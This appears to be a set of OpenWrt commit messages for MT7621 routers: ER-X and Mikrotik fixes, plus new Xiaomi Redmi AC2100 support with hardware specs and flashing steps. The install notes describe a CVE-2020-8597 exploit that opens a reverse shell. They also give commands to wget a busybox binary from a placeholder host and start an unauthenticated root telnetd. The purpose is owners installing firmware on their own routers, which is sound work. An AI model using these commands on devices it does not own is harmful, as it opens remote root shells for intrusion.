the expected behaviour expected from OpenWrt, maintains the current
documentation as up-to-date, and does not require the user to manually
detach eth0 from the LAN bridge, create the WAN(6) interface(s), and set
eth0 to the WAN(6) interface(s).
Fixes: 5acd1ed0be0d ("ramips: mt7621: fix Ubiquiti ER-X ports names and MAC addresses")
Signed-off-by: Perry Melange <isprotejesvalkata@gmail.com>
[commit subject and description tweaks]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Commit f761f4052c4 had bogus case syntax, the uci-defaults script threw
errors as a result and exited non-zero, probably didn't do what was
intended, but tried over and over since the non-zero exit prevents the
script from being deleted.
Fixes: f761f4052c41 ("ramips: mt7621: harmonize naming scheme for Mikrotik")
Signed-off-by: Russell Senior <russell@personaltelco.net>
[extend commit title, add Fixes]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>